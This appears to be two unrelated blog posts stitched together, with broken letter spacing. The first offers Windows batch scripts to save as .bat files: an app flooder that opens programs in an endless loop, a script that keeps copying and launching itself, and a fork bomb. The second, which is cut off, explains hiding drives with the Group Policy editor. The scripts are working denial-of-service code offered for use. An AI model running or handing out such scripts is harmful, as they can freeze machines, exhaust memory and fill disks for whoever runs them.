H ey Friends in this blog i will share a few interesting batch programming notes just save the text with the format of .bat A pp Flooder : @echo off x //label start winword //MS word start mspaint //paint start notepad start write //wordpad start cmd //cmd prompt start explorer start control //panel start calc //calculator goto x //infinite loop O ver L oading M emory : @echo off :A SET /A x=%RANDOM%%%1999999999% type damage.bat >> %x%.bat start %x%.bat goto:A F ork B omb : :s start %0 goto s
Hey There Every one In these blog I want to share a few essential tricks for Windows 7. How To Hide Any Drive in Windows Most of you must have wondered if there exists a way without using software to Hide A Drive completely so that it cannot be viewed or accessed without unlocking it. so, here is a easiest method to hide drive simple 4 steps. Follow The Steps To Do This.. Step 1 : Go to run type “gpedit.msc” (without quotes) Step 2 : Select user configuration —> administrative templates —> windows components —> windows explorer(click on it) Step 3 : On right panel search for hide theses specified drives in my computer. Step 4 : Double click it mark on enable to hide the drive and select drive the which you want to hide. If u want to hide all the drives which are on your system then select restrict all drives. to make it unhidden mark on disable option.. I hope this t...